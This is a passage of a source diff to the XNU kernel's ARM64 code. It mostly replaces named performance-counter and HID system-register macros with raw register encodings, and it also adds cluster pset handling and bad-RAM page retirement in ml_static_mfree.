SREG_READ("S3_2_C15_C3_0")); + kprintf("S3_2_C15_C4_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C4_0")); + kprintf("S3_2_C15_C5_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C5_0")); + kprintf("S3_2_C15_C6_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C6_0")); + kprintf("S3_2_C15_C7_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C7_0")); #if (KPC_ARM64_CONFIGURABLE_COUNT > 6) - kprintf("PMC8 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC8)); - kprintf("PMC9 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC9)); + kprintf("S3_2_C15_C9_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C9_0")); + kprintf("S3_2_C15_C10_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C10_0")); #endif } #endif @@ -348,7 +317,7 @@ enable_counter(uint32_t counter) uint64_t pmcr0 = 0; boolean_t counter_running, pmi_enabled, enabled; - pmcr0 = SREG_READ(SREG_PMCR0) | 0x3 /* leave the fixed counters enabled for monotonic */; + pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3 /* leave the fixed counters enabled for monotonic */; counter_running = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0; pmi_enabled = (pmcr0 & PMCR0_PMI_ENABLE_MASK(counter)) != 0; @@ -358,7 +327,7 @@ enable_counter(uint32_t counter) if (!enabled) { pmcr0 |= PMCR0_PMC_ENABLE_MASK(counter); pmcr0 |= PMCR0_PMI_ENABLE_MASK(counter); - SREG_WRITE(SREG_PMCR0, pmcr0); + SREG_WRITE("S3_1_C15_C0_0", pmcr0); } return enabled; @@ -374,12 +343,12 @@ disable_counter(uint32_t counter) return true; } - pmcr0 = SREG_READ(SREG_PMCR0) | 0x3; + pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3; enabled = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0; if (enabled) { pmcr0 &= PMCR0_PMC_DISABLE_MASK(counter); - SREG_WRITE(SREG_PMCR0, pmcr0); + SREG_WRITE("S3_1_C15_C0_0", pmcr0); } return enabled; @@ -418,11 +387,11 @@ set_modes(uint32_t counter, kpc_config_t cfgword) bits = PMCR1_EL_ALL_ENABLE_MASK(counter); } - uint64_t pmcr1 = SREG_READ(SREG_PMCR1); + uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0"); pmcr1 &= PMCR1_EL_ALL_DISABLE_MASK(counter); pmcr1 |= bits; pmcr1 |= 0x30303; /* monotonic compatibility */ - SREG_WRITE(SREG_PMCR1, pmcr1); + SREG_WRITE("S3_1_C15_C1_0", pmcr1); saved_PMCR[cpuid][1] = pmcr1; } @@ -430,17 +399,17 @@ static uint64_t read_counter(uint32_t counter) { switch (counter) { - // case 0: return SREG_READ(SREG_PMC0); - // case 1: return SREG_READ(SREG_PMC1); - case 2: return SREG_READ(SREG_PMC2); - case 3: return SREG_READ(SREG_PMC3); - case 4: return SREG_READ(SREG_PMC4); - case 5: return SREG_READ(SREG_PMC5); - case 6: return SREG_READ(SREG_PMC6); - case 7: return SREG_READ(SREG_PMC7); + // case 0: return SREG_READ("PMC0"); + // case 1: return SREG_READ("PMC1"); + case 2: return SREG_READ("S3_2_C15_C2_0"); + case 3: return SREG_READ("S3_2_C15_C3_0"); + case 4: return SREG_READ("S3_2_C15_C4_0"); + case 5: return SREG_READ("S3_2_C15_C5_0"); + case 6: return SREG_READ("S3_2_C15_C6_0"); + case 7: return SREG_READ("S3_2_C15_C7_0"); #if (KPC_ARM64_CONFIGURABLE_COUNT > 6) - case 8: return SREG_READ(SREG_PMC8); - case 9: return SREG_READ(SREG_PMC9); + case 8: return SREG_READ("S3_2_C15_C9_0"); + case 9: return SREG_READ("S3_2_C15_C10_0"); #endif default: return 0; } @@ -450,17 +419,17 @@ static void write_counter(uint32_t counter, uint64_t value) { switch (counter) { - // case 0: SREG_WRITE(SREG_PMC0, value); break; - // case 1: SREG_WRITE(SREG_PMC1, value); break; - case 2: SREG_WRITE(SREG_PMC2, value); break; - case 3: SREG_WRITE(SREG_PMC3, value); break; - case 4: SREG_WRITE(SREG_PMC4, value); break; - case 5: SREG_WRITE(SREG_PMC5, value); break; - case 6: SREG_WRITE(SREG_PMC6, value); break; - case 7: SREG_WRITE(SREG_PMC7, value); break; + // case 0: SREG_WRITE("PMC0", value); break; + // case 1: SREG_WRITE("PMC1", value); break; + case 2: SREG_WRITE("S3_2_C15_C2_0", value); break; + case 3: SREG_WRITE("S3_2_C15_C3_0", value); break; + case 4: SREG_WRITE("S3_2_C15_C4_0", value); break; + case 5: SREG_WRITE("S3_2_C15_C5_0", value); break; + case 6: SREG_WRITE("S3_2_C15_C6_0", value); break; + case 7: SREG_WRITE("S3_2_C15_C7_0", value); break; #if (KPC_ARM64_CONFIGURABLE_COUNT > 6) - case 8: SREG_WRITE(SREG_PMC8, value); break; - case 9: SREG_WRITE(SREG_PMC9, value); break; + case 8: SREG_WRITE("S3_2_C15_C9_0", value); break; + case 9: SREG_WRITE("S3_2_C15_C10_0", value); break; #endif default: break; } @@ -475,18 +444,18 @@ kpc_rawpmu_config_count(void) int kpc_get_rawpmu_config(kpc_config_t *configv) { - configv[0] = SREG_READ(SREG_PMCR2); - configv[1] = SREG_READ(SREG_PMCR3); - configv[2] = SREG_READ(SREG_PMCR4); - configv[3] = SREG_READ(SREG_OPMAT0); - configv[4] = SREG_READ(SREG_OPMAT1); - configv[5] = SREG_READ(SREG_OPMSK0); - configv[6] = SREG_READ(SREG_OPMSK1); + configv[0] = SREG_READ("S3_1_C15_C2_0"); + configv[1] = SREG_READ("S3_1_C15_C3_0"); + configv[2] = SREG_READ("S3_1_C15_C4_0"); + configv[3] = SREG_READ("S3_1_C15_C7_0"); + configv[4] = SREG_READ("S3_1_C15_C8_0"); + configv[5] = SREG_READ("S3_1_C15_C9_0"); + configv[6] = SREG_READ("S3_1_C15_C10_0"); #if RAWPMU_CONFIG_COUNT > 7 - configv[7] = SREG_READ(SREG_PMMMAP); - configv[8] = SREG_READ(SREG_PMTRHLD2); - configv[9] = SREG_READ(SREG_PMTRHLD4); - configv[10] = SREG_READ(SREG_PMTRHLD6); + configv[7] = SREG_READ("S3_2_C15_C15_0"); + configv[8] = SREG_READ("S3_2_C15_C14_0"); + configv[9] = SREG_READ("S3_2_C15_C13_0"); + configv[10] = SREG_READ("S3_2_C15_C12_0"); #endif return 0; } @@ -494,18 +463,18 @@ kpc_get_rawpmu_config(kpc_config_t *configv) static int kpc_set_rawpmu_config(kpc_config_t *configv) { - SREG_WRITE(SREG_PMCR2, configv[0]); - SREG_WRITE(SREG_PMCR3, configv[1]); - SREG_WRITE(SREG_PMCR4, configv[2]); - SREG_WRITE(SREG_OPMAT0, configv[3]); - SREG_WRITE(SREG_OPMAT1, configv[4]); - SREG_WRITE(SREG_OPMSK0, configv[5]); - SREG_WRITE(SREG_OPMSK1, configv[6]); + SREG_WRITE("S3_1_C15_C2_0", configv[0]); + SREG_WRITE("S3_1_C15_C3_0", configv[1]); + SREG_WRITE("S3_1_C15_C4_0", configv[2]); + SREG_WRITE("S3_1_C15_C7_0", configv[3]); + SREG_WRITE("S3_1_C15_C8_0", configv[4]); + SREG_WRITE("S3_1_C15_C9_0", configv[5]); + SREG_WRITE("S3_1_C15_C10_0", configv[6]); #if RAWPMU_CONFIG_COUNT > 7 - SREG_WRITE(SREG_PMMMAP, configv[7]); - SREG_WRITE(SREG_PMTRHLD2, configv[8]); - SREG_WRITE(SREG_PMTRHLD4, configv[9]); - SREG_WRITE(SREG_PMTRHLD6, configv[10]); + SREG_WRITE("S3_2_C15_C15_0", configv[7]); + SREG_WRITE("S3_2_C15_C14_0", configv[8]); + SREG_WRITE("S3_2_C15_C13_0", configv[9]); + SREG_WRITE("S3_2_C15_C12_0", configv[10]); #endif return 0; } @@ -520,13 +489,13 @@ save_regs(void) assert(ml_get_interrupts_enabled() == FALSE); /* Save event selections. */ - saved_PMESR[cpuid][0] = SREG_READ(SREG_PMESR0); - saved_PMESR[cpuid][1] = SREG_READ(SREG_PMESR1); + saved_PMESR[cpuid][0] = SREG_READ("S3_1_C15_C5_0"); + saved_PMESR[cpuid][1] = SREG_READ("S3_1_C15_C6_0"); kpc_get_rawpmu_config(saved_RAWPMU[cpuid]); /* Disable the counters. */ - // SREG_WRITE(SREG_PMCR0, clear); + // SREG_WRITE("S3_1_C15_C0_0", clear); /* Finally, save state for each counter*/ for (int i = 2; i < KPC_ARM64_PMC_COUNT; i++) { @@ -540,8 +509,8 @@ restore_regs(void) int cpuid = cpu_number(); /* Restore PMESR values. */ - SREG_WRITE(SREG_PMESR0, saved_PMESR[cpuid][0]); - SREG_WRITE(SREG_PMESR1, saved_PMESR[cpuid][1]); + SREG_WRITE("S3_1_C15_C5_0", saved_PMESR[cpuid][0]); + SREG_WRITE("S3_1_C15_C6_0", saved_PMESR[cpuid][1]); kpc_set_rawpmu_config(saved_RAWPMU[cpuid]); @@ -551,7 +520,7 @@ restore_regs(void) } /* Restore PMCR0/1 values (with PMCR0 last to enable). */ - SREG_WRITE(SREG_PMCR1, saved_PMCR[cpuid][1] | 0x30303); + SREG_WRITE("S3_1_C15_C1_0", saved_PMCR[cpuid][1] | 0x30303); } static uint64_t @@ -564,7 +533,7 @@ get_counter_config(uint32_t counter) case 3: /* FALLTHROUGH */ case 4: /* FALLTHROUGH */ case 5: - pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR0), counter, 2); + pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C5_0"), counter, 2); break; case 6: /* FALLTHROUGH */ case 7: @@ -573,7 +542,7 @@ get_counter_config(uint32_t counter) case 8: /* FALLTHROUGH */ case 9: #endif - pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR1), counter, 6); + pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C6_0"), counter, 6); break; default: pmesr = 0; @@ -582,7 +551,7 @@ get_counter_config(uint32_t counter) kpc_config_t config = pmesr; - uint64_t pmcr1 = SREG_READ(SREG_PMCR1); + uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0"); if (pmcr1 & PMCR1_EL0_A32_ENABLE_MASK(counter)) { config |= CFGWORD_EL0A32EN_MASK; @@ -616,10 +585,10 @@ set_counter_config(uint32_t counter, uint64_t config) case 3: /* FALLTHROUGH */ case 4: /* FALLTHROUGH */ case 5: - pmesr = SREG_READ(SREG_PMESR0); + pmesr = SREG_READ("S3_1_C15_C5_0"); pmesr &= PMESR_EVT_CLEAR(counter, 2); pmesr |= PMESR_EVT_ENCODE(config, counter, 2); - SREG_WRITE(SREG_PMESR0, pmesr); + SREG_WRITE("S3_1_C15_C5_0", pmesr); saved_PMESR[cpuid][0] = pmesr; break; @@ -630,10 +599,10 @@ set_counter_config(uint32_t counter, uint64_t config) case 8: /* FALLTHROUGH */ case 9: #endif - pmesr = SREG_READ(SREG_PMESR1); + pmesr = SREG_READ("S3_1_C15_C6_0"); pmesr &= PMESR_EVT_CLEAR(counter, 6); pmesr |= PMESR_EVT_ENCODE(config, counter, 6); - SREG_WRITE(SREG_PMESR1, pmesr); + SREG_WRITE("S3_1_C15_C6_0", pmesr); saved_PMESR[cpuid][1] = pmesr; break; default: diff --git a/osfmk/arm64/locore.s b/osfmk/arm64/locore.s index c85b85ebc..6f9bf122b 100644 --- a/osfmk/arm64/locore.s +++ b/osfmk/arm64/locore.s @@ -27,6 +27,7 @@ */ #include +#include #include #include #include @@ -69,14 +70,14 @@ .macro COMPARE_BRANCH_FUSION #if defined(APPLE_ARM64_ARCH_FAMILY) - mrs $1, ARM64_REG_HID1 + mrs $1, HID1 .if $0 == CBF_DISABLE orr $1, $1, ARM64_REG_HID1_disCmpBrFusion .else mov $2, ARM64_REG_HID1_disCmpBrFusion bic $1, $1, $2 .endif - msr ARM64_REG_HID1, $1 + msr HID1, $1 .if $0 == CBF_DISABLE isb sy .endif @@ -938,13 +939,9 @@ no_asts: ARM64_IS_PCORE x12 // if we're not a pCORE, also do nothing cbz x12, 1f -#endif - -#if defined(APPLELIGHTNING) || defined(APPLEFIRESTORM) - - mrs x12, ARM64_REG_HID1 // if any debug session ever existed, set forceNexL3ClkOn + mrs x12, HID1 // if any debug session ever existed, set forceNexL3ClkOn orr x12, x12, ARM64_REG_HID1_forceNexL3ClkOn - msr ARM64_REG_HID1, x12 + msr HID1, x12 1: #endif diff --git a/osfmk/arm64/machine_routines.c b/osfmk/arm64/machine_routines.c index c40e24e6f..3b616122b 100644 --- a/osfmk/arm64/machine_routines.c +++ b/osfmk/arm64/machine_routines.c @@ -184,15 +184,15 @@ ml_cpu_signal_type(unsigned int cpu_mpidr, uint32_t type) MRS(local_mpidr, "MPIDR_EL1"); if (MPIDR_CLUSTER_ID(local_mpidr) == MPIDR_CLUSTER_ID(cpu_mpidr)) { uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr); - MSR(ARM64_REG_IPI_RR_LOCAL, x); + MSR("S3_5_C15_C0_0", x); } else { #define IPI_RR_TARGET_CLUSTER_SHIFT 16 uint64_t x = type | (MPIDR_CLUSTER_ID(cpu_mpidr) << IPI_RR_TARGET_CLUSTER_SHIFT) | MPIDR_CPU_ID(cpu_mpidr); - MSR(ARM64_REG_IPI_RR_GLOBAL, x); + MSR("S3_5_C15_C0_1", x); } #else uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr); - MSR(ARM64_REG_IPI_RR, x); + MSR("S3_5_C15_C0_1", x); #endif } #endif @@ -236,7 +236,7 @@ ml_cpu_signal_deferred_adjust_timer(uint64_t nanosecs) /* update deferred_ipi_timer_ns with the new clamped value */ absolutetime_to_nanoseconds(abstime, &deferred_ipi_timer_ns); - MSR(ARM64_REG_IPI_CR, abstime); + MSR("S3_5_C15_C3_1", abstime); #else (void)nanosecs; panic("Platform does not support ACC Fast IPI"); @@ -494,6 +494,7 @@ machine_processor_shutdown( return Shutdown_context(doshutdown, processor); } + /* * Routine: ml_init_lock_timeout * Function: @@ -531,6 +532,8 @@ ml_init_lock_timeout(void) } MutexSpin = abstime; low_MutexSpin = MutexSpin; + + /* * high_MutexSpin should be initialized as low_MutexSpin * real_ncpus, but * real_ncpus is not set at this time @@ -543,6 +546,17 @@ ml_init_lock_timeout(void) nanoseconds_to_absolutetime(MAX_WFE_HINT_INTERVAL_US * NSEC_PER_USEC, &ml_wfe_hint_max_interval); } +/* + * This is called when all of the ml_processor_info_t structures have been + * initialized and all the processors have been started through processor_start(). + * + * Required by the scheduler subsystem. + */ +void +ml_cpu_init_completed(void) +{ +} + /* * This is called from the machine-independent routine cpu_up() * to perform machine-dependent info updates. @@ -822,29 +836,6 @@ ml_read_chip_revision(unsigned int *rev __unused) #endif } -static boolean_t -ml_parse_interrupt_prop(const DTEntry entry, ml_topology_cpu_t *cpu) -{ - uint32_t const *prop; - unsigned int propSize; - - if (SecureDTGetProperty(entry, "interrupts", (void const **)&prop, &propSize) != kSuccess) { - return FALSE; - } - - if (propSize == sizeof(uint32_t) * 1) { - cpu->pmi_irq = prop[0]; - return TRUE; - } else if (propSize == sizeof(uint32_t) * 3) { - cpu->self_ipi_irq = prop[0]; - cpu->pmi_irq = prop[1]; - cpu->other_ipi_irq = prop[2]; - return TRUE; - } else { - return FALSE; - } -} - void ml_parse_cpu_topology(void) { @@ -903,7 +894,6 @@ ml_parse_cpu_topology(void) cpu->l3_cache_size = (uint32_t)ml_readprop(child, "l3-cache-size", 0); cpu->l3_cache_id = (uint32_t)ml_readprop(child, "l3-cache-id", 0); - ml_parse_interrupt_prop(child, cpu); ml_read_reg_range(child, "cpu-uttdbg-reg", &cpu->cpu_UTTDBG_pa, &cpu->cpu_UTTDBG_len); ml_read_reg_range(child, "cpu-impl-reg", &cpu->cpu_IMPL_pa, &cpu->cpu_IMPL_len); ml_read_reg_range(child, "coresight-reg", &cpu->coresight_pa, &cpu->coresight_len); @@ -1231,7 +1221,43 @@ ml_processor_register(ml_processor_info_t *in_processor_info, this_cpu_datap->cluster_master = is_boot_cpu; #endif /* HAS_CLUSTER */ +#if !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) + { + /* Workaround for the existing scheduler + * code, which only supports a limited number of psets. + * + * To get around that limitation, we distribute all cores into + * two psets according to their cluster type, instead of + * having a dedicated pset per cluster ID. + */ + + pset_cluster_type_t pset_cluster_type; + + /* For this workaround, we don't expect seeing anything else + * than E or P clusters. */ + switch (in_processor_info->cluster_type) { + case CLUSTER_TYPE_E: + pset_cluster_type = PSET_AMP_E; + break; + case CLUSTER_TYPE_P: + pset_cluster_type = PSET_AMP_P; + break; + default: + panic("unknown/unsupported cluster type %d", in_processor_info->cluster_type); + } + + pset = pset_find_first_by_cluster_type(pset_cluster_type); + + if (pset == NULL) { + panic("no pset for cluster type %d/%d", in_processor_info->cluster_type, pset_cluster_type); + } + + kprintf("%s>chosen pset with cluster id %d cluster type %d for core:\n", + __FUNCTION__, pset->pset_cluster_id, pset->pset_cluster_type); + } +#else /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */ pset = pset_find(in_processor_info->cluster_id, processor_pset(master_processor)); +#endif /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */ assert(pset != NULL); kprintf("%s>cpu_id %p cluster_id %d cpu_number %d is type %d\n", __FUNCTION__, in_processor_info->cpu_id, in_processor_info->cluster_id, this_cpu_datap->cpu_number, in_processor_info->cluster_type); @@ -1560,12 +1586,25 @@ ml_static_protect( void ml_static_mfree( vm_offset_t vaddr, - vm_size_t size) + vm_size_t size) { - vm_offset_t vaddr_cur; - ppnum_t ppn; - uint32_t freed_pages = 0; - uint32_t freed_kernelcache_pages = 0; + vm_offset_t vaddr_cur; + ppnum_t ppn; + uint32_t freed_pages = 0; + uint32_t bad_page_cnt = 0; + uint32_t freed_kernelcache_pages = 0; + +#if defined(__arm64__) && (DEVELOPMENT || DEBUG) + /* For testing hitting a bad ram page */ + static int count = 0; + static int bad_at_cnt = -1; + static bool first = true; + + if (first) { + (void)PE_parse_boot_argn("bad_static_mfree", &bad_at_cnt, sizeof(bad_at_cnt)); + first = false; + } +#endif /* defined(__arm64__) && (DEVELOPMENT || DEBUG) */ /* It is acceptable (if bad) to fail to free. */ if (vaddr < VM_MIN_KERNEL_ADDRESS) { @@ -1589,6 +1628,19 @@ ml_static_mfree( panic("Failed ml_static_mfree on %p", (void *) vaddr_cur); } +#if defined(__arm64__) + bool is_bad = pmap_is_bad_ram(ppn); +#if DEVELOPMENT || DEBUG + is_bad |= (count++ == bad_at_cnt); +#endif /* DEVELOPMENT || DEBUG */ + + if (is_bad) { + ++bad_page_cnt; + vm_page_create_retired(ppn); + continue; + } +#endif /* defined(__arm64__) */ + vm_page_create(ppn, (ppn + 1)); freed_pages++; if (vaddr_cur >= segLOWEST && vaddr_cur < end_kern) { @@ -1602,7 +1654,7 @@ ml_static_mfree( vm_page_kernelcache_count -= freed_kernelcache_pages; vm_page_unlock_queues(); #if DEBUG - kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn); + kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x, +%d bad\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn, bad_page_cnt); #endif } @@ -1888,7 +1940,7 @@ cache_trap_error(thread_t thread, vm_map_address_t fault_addr) } static void -cache_trap_recover() +cache_trap_recover(void) { vm_map_address_t fault_addr; @@ -1901,7 +1953,8 @@ static void set_cache_trap_recover(thread_t thread) { #if defined(HAS_APPLE_PAC) - thread->recover = (vm_address_t)ptrauth_auth_and_resign(&cache_trap_recover, + void *fun = &cache_trap_recover; + thread->recover = (vm_address_t)ptrauth_auth_and_resign(fun, ptrauth_key_function_pointer, 0, ptrauth_key_function_pointer, ptrauth_blend_discriminator(&thread->recover, PAC_DISCRIMINATOR_RECOVER)); #else /* defined(HAS_APPLE_PAC) */ diff --git a/osfmk/arm64/machine_routines_asm.s b/osfmk/arm64/machine_routines_asm.s index 5c88ab5c4..f1f0da437 100644 --- a/osfmk/arm64/machine_routines_asm.s +++ b/osfmk/arm64/machine_routines_asm.s @@ -36,6 +36,30 @@ #include "assym.s" +#if defined(HAS_APPLE_PAC) + + +.macro LOAD_CPU_JOP_KEY dst, tmp + mrs \tmp, TPIDR_EL1 + ldr \tmp, [\tmp, ACT_CPUDATAP] + ldr \dst, [\tmp, CPU_JOP_KEY] +.endmacro + +/* + * uint64_t ml_enable_user_jop_key(uint64_t user_jop_key) + */ + .align 2 + .globl EXT(ml_enable_user_jop_key) +LEXT(ml_enable_user_jop_key) + +/* + * void ml_disable_user_jop_key(uint64_t user_jop_key, uint64_t saved_jop_state) + */ + .align 2 + .globl EXT(ml_disable_user_jop_key) +LEXT(ml_disable_user_jop_key) + +#endif /* defined(HAS_APPLE_PAC) */ #if HAS_BP_RET @@ -53,11 +77,11 @@ LEXT(set_bp_ret) add x14, x14, EXT(bp_ret)@pageoff ldr w14, [x14] - mrs x13, ARM64_REG_ACC_CFG + mrs x13, CPU_CFG and x13, x13, (~(ARM64_REG_ACC_CFG_bpSlp_mask << ARM64_REG_ACC_CFG_bpSlp_shift)) and x14, x14, #(ARM64_REG_ACC_CFG_bpSlp_mask) orr x13, x13, x14, lsl #(ARM64_REG_ACC_CFG_bpSlp_shift) - msr ARM64_REG_ACC_CFG, x13 + msr CPU_CFG, x13 ret #endif // HAS_BP_RET @@ -72,8 +96,8 @@ LEXT(set_nex_pg) cbz x14, Lnex_pg_done // Set the SEG-recommended value of 12 additional reset cycles - HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13 - HID_SET_BITS ARM64_REG_HID14, ARM64_REG_HID14_NexPwgEn, x13 + HID_INSERT_BITS HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13 + HID_SET_BITS HID14, ARM64_REG_HID14_NexPwgEn, x13 Lnex_pg_done: ret @@ -190,7 +214,7 @@ LEXT(set_mmu_ttb_alternate) #else #if defined(HAS_VMSA_LOCK) #if DEBUG || DEVELOPMENT - mrs x1, ARM64_REG_VMSA_LOCK_EL1 + mrs x1, VMSA_LOCK_EL1 and x1, x1, #(VMSA_LOCK_TTBR1_EL1) cbnz x1, L_set_locked_reg_panic #endif /* DEBUG || DEVELOPMENT */ @@ -265,7 +289,7 @@ LEXT(vmsa_lock) mov x0, #(VMSA_LOCK_TTBR1_EL1 | VMSA_LOCK_TCR_EL1 | VMSA_LOCK_VBAR_EL1) #endif orr x0, x0, x1 - msr ARM64_REG_VMSA_LOCK_EL1, x0 + msr VMSA_LOCK_EL1, x0 isb sy ret #endif /* defined(HAS_VMSA_LOCK) */ @@ -293,7 +317,7 @@ LEXT(set_tcr) #if defined(HAS_VMSA_LOCK) #if DEBUG || DEVELOPMENT // assert TCR unlocked - mrs x1, ARM64_REG_VMSA_LOCK_EL1 + mrs x1, VMSA_LOCK_EL1 and x1, x1, #(VMSA_LOCK_TCR_EL1) cbnz x1, L_set_locked_reg_panic #endif /* DEBUG || DEVELOPMENT */ @@ -730,7 +754,7 @@ LEXT(arm64_prepare_for_sleep) #if defined(APPLETYPHOON) // - HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9 + HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9 dsb sy isb sy #endif @@ -738,11 +762,11 @@ LEXT(arm64_prepare_for_sleep) #if HAS_CLUSTER cbnz x0, 1f // Skip if deep_sleep == true // Mask FIQ and IRQ to avoid spurious wakeups - mrs x9, ARM64_REG_CYC_OVRD + mrs x9, CPU_OVRD and x9, x9, #(~(ARM64_REG_CYC_OVRD_irq_mask | ARM64_REG_CYC_OVRD_fiq_mask)) mov x10, #(ARM64_REG_CYC_OVRD_irq_disable | ARM64_REG_CYC_OVRD_fiq_disable) orr x9, x9, x10 - msr ARM64_REG_CYC_OVRD, x9 + msr CPU_OVRD, x9 isb 1: #endif @@ -750,7 +774,7 @@ LEXT(arm64_prepare_for_sleep) cbz x0, 1f // Skip if deep_sleep == false #if __ARM_GLOBAL_SLEEP_BIT__ // Enable deep sleep - mrs x1, ARM64_REG_ACC_OVRD + mrs x1, ACC_OVRD orr x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep) and x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask)) orr x1, x1, #( ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep) @@ -763,23 +787,40 @@ LEXT(arm64_prepare_for_sleep) #if HAS_RETENTION_STATE orr x1, x1, #(ARM64_REG_ACC_OVRD_disPioOnWfiCpu) #endif - msr ARM64_REG_ACC_OVRD, x1 + msr ACC_OVRD, x1 +#if defined(APPLEMONSOON) + // Skye has an ACC_OVRD register for EBLK and PBLK. Same bitfield layout for these bits + mrs x1, EBLK_OVRD + orr x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnSRM_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_ok2PwrDnSRM_deepsleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2TrDnLnk_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_ok2TrDnLnk_deepsleep) + and x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnCPM_mask)) + orr x1, x1, #( ARM64_REG_ACC_OVRD_ok2PwrDnCPM_deepsleep) + msr EBLK_OVRD, x1 + +#endif #else +#if defined(APPLETYPHOON) || defined(APPLETWISTER) // Enable deep sleep mov x1, ARM64_REG_CYC_CFG_deepSleep - msr ARM64_REG_CYC_CFG, x1 + msr CPU_CFG, x1 +#endif #endif 1: // Set "OK to power down" () - mrs x9, ARM64_REG_CYC_OVRD + mrs x9, CPU_OVRD orr x9, x9, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_down) #if HAS_RETENTION_STATE orr x9, x9, #(ARM64_REG_CYC_OVRD_disWfiRetn) #endif - msr ARM64_REG_CYC_OVRD, x9 + msr CPU_OVRD, x9 #if defined(APPLEMONSOON) || defined(APPLEVORTEX) ARM64_IS_PCORE x9 @@ -802,12 +843,12 @@ LEXT(arm64_prepare_for_sleep) mrs x9, MIDR_EL1 EXEC_COREALL_REVLO CPU_VERSION_B0, x9, x10 #endif - mrs x9, ARM64_REG_HID10 + mrs x9, HID10 orr x9, x9, #(ARM64_REG_HID10_DisHwpGups) - msr ARM64_REG_HID10, x9 + msr HID10, x9 isb sy and x9, x9, #(~(ARM64_REG_HID10_DisHwpGups)) - msr ARM64_REG_HID10, x9 + msr HID10, x9 isb sy #endif EXEC_END @@ -829,9 +870,9 @@ LEXT(arm64_force_wfi_clock_gate) ARM64_STACK_PROLOG PUSH_FRAME - mrs x0, ARM64_REG_CYC_OVRD + mrs x0, CPU_OVRD orr x0, x0, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_up) - msr ARM64_REG_CYC_OVRD, x0 + msr CPU_OVRD, x0 POP_FRAME ARM64_STACK_EPILOG @@ -863,7 +904,7 @@ LEXT(typhoon_prepare_for_wfi) PUSH_FRAME // - HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 + HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 dsb sy isb sy @@ -878,7 +919,7 @@ LEXT(typhoon_return_from_wfi) PUSH_FRAME // - HID_CLEAR_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 + HID_CLEAR_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0 dsb sy isb sy @@ -923,57 +964,57 @@ LEXT(cpu_defeatures_set) cmp x0, #1 b.ne cpu_defeatures_set_ret LOAD_UINT64 x1, HID0_DEFEATURES_1 - mrs x0, ARM64_REG_HID0 + mrs x0, HID0 orr x0, x0, x1 - msr ARM64_REG_HID0, x0 + msr HID0, x0 LOAD_UINT64 x1, HID1_DEFEATURES_1 - mrs x0, ARM64_REG_HID1 + mrs x0, HID1 orr x0, x0, x1 - msr ARM64_REG_HID1, x0 + msr HID1, x0 LOAD_UINT64 x1, HID2_DEFEATURES_1 - mrs x0, ARM64_REG_HID2 + mrs x0, HID2 orr x0, x0, x1 - msr ARM64_REG_HID2, x0 + msr HID2, x0 LOAD_UINT64 x1, HID3_DEFEATURES_1 - mrs x0, ARM64_REG_HID3 + mrs x0, HID3 orr x0, x0, x1 - msr ARM64_REG_HID3, x0 + msr HID3, x0 LOAD_UINT64 x1, HID4_DEFEATURES_1 - mrs x0, ARM64_REG_HID4 + mrs x0, S3_0_C15_C4_0 orr x0, x0, x1 - msr ARM64_REG_HID4, x0 + msr S3_0_C15_C4_0, x0 LOAD_UINT64 x1, HID7_DEFEATURES_1 - mrs x0, ARM64_REG_HID7 + mrs x0, HID7 orr x0, x0, x1 - msr ARM64_REG_HID7, x0 + msr HID7, x0 dsb sy isb sy b cpu_defeatures_set_ret cpu_defeatures_set_2: LOAD_UINT64 x1, HID0_DEFEATURES_2 - mrs x0, ARM64_REG_HID0 + mrs x0, HID0 orr x0, 